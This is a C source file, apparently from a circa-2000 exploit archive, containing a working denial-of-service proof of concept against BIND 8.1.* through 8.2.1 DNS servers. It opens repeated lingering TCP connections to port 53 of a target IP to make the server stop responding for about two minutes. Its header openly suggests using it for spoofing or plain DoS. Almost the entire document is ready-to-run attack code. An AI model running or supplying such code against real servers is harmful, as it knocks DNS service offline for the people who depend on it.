home *** CD-ROM | disk | FTP | other *** search
- /*
- * "solinger" Denial Of Service - bind 8.1.*, 8.2, 8.2.1
- * by Mixter <mixter@newyorkoffice.com> / members.tripod.com/mixtersecurity
- *
- * Impact: causes a bind8 server to stop responding to requests
- * for up to 120 seconds. Quick proof of concept of the
- * bug pointed out by ISC. (Might be handy while trying
- * to 'snoof' or for plain DoS purpose...)
- */
-
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <signal.h>
- #include <errno.h>
- #include <unistd.h>
- #include <fcntl.h>
-
- #define DNS 53
- #define RETRY 10
-
- int
- main (int argc, char **argv)
- {
- struct linger l1ng3r;
- int tsock, probe, i;
- struct sockaddr_in target;
-
- if (argc != 2)
- {
- printf ("usage: %s <lame_dns's_ip>\n", argv[0]);
- exit (0);
- }
- printf ("unbind - SO_LINGER bind DoS (c) Mixter\n");
- printf ("sending to %s: ", argv[1]);
- fflush (0);
- for (i = 0; i < RETRY; i++)
- {
- tsock = socket (AF_INET, SOCK_STREAM, 0);
- l1ng3r.l_onoff = 1;
- if (setsockopt (tsock, SOL_SOCKET, SO_LINGER, (void *) &l1ng3r, sizeof (l1ng3r)) < 0)
- {
- perror ("setsockopt");
- exit (0);
- }
-
- target.sin_family = AF_INET;
- target.sin_port = htons (DNS);
- target.sin_addr.s_addr = inet_addr (argv[1]);
- if (target.sin_addr.s_addr == -1)
- {
- printf ("invalid ip '%s', dufus!\n", argv[1]);
- exit (0);
- }
-
- bzero (&target.sin_zero, 8);
- probe = connect (tsock, (struct sockaddr *) &target, sizeof (struct sockaddr));
- if (probe == 0)
- printf (".");
- close (tsock);
- fflush (0);
- }
- printf ("done (should not be responding for 2 minutes)\n");
- return 0;
- }
- /* www.hack.co.za [2000]*/